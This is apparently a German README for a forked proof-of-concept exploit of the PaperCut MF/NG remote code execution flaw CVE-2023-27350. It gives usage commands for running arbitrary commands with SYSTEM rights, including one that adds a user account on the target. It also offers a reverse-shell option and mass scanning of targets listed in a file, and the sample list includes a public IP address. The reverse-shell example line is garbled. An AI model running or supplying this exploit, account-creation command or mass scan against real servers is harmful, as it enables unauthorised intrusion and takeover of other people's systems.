
Exploit für Papercut CVE-2023-27350. [+] Reverse Shell [+] Massenüberprüfung
Dies ist ein Proof-of-Concept (POC)-Exploit für CVE-2023-27350, eine Sicherheitslücke in PaperCut MF/NG, die es einem nicht authentifizierten Angreifer ermöglicht, beliebigen Code mit SYSTEM-Berechtigungen auszuführen.
Stellen Sie vor der Verwendung dieses Exploits sicher, dass Sie die folgenden Bibliotheken installiert haben:
pip install -r requirements.txt
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]
-u, --url: Die URL der Ziel-PaperCut-MF/NG-Anwendung (z. B. http://target-ip:9191).-c, --command: Der Befehl, der auf dem Zielsystem ausgeführt werden soll.--reverse-shell: Verwenden Sie eine Reverse-Shell-Nutzlast, um Befehle auf dem Zielsystem auszuführen.-f, --file: Überprüfen Sie mehrere Ziele aus einer Datei (z. B. file.txt).Um einen Befehl auf dem Zielsystem auszuführen, verwenden Sie die Option -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Um eine Reverse-Shell-Nutzlast zu verwenden, um Befehle auf dem Zielsystem auszuführen, verwenden Sie die Option --reverse-shell. Sie werden aufgefordert, Ihre IP-Adresse und Portnummer einzugeben:
: : <> : <>
Um mehrere Ziele aus einer Datei zu überprüfen, verwenden Sie die Option -f. Das Format der Datei sollte ip_address:port sein:
python CVE-2023-27350.py -f file.txt
file.txtWenn Sie die Option zur Massenüberprüfung mit der Eingabe file.txt verwenden, stellen Sie sicher, dass der Inhalt der Datei korrekt formatiert ist.
Jede Zeile der Datei sollte die IP-Adresse und Portnummer eines Ziels enthalten, getrennt durch einen Doppelpunkt :. Zum Beispiel:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
Stellen Sie sicher, dass zwischen der IP-Adresse, dem Doppelpunkt und der Portnummer keine zusätzlichen Leerzeichen oder Zeichen vorhanden sind. Stellen Sie außerdem sicher, dass jede Zeile nur eine IP-Adresse und Portnummer enthält.
Dies ist eine geforkte Version des Repositories horizon3ai/CVE-2023-27350. Alle Credits für den ursprünglichen Exploit gehen an die Autoren.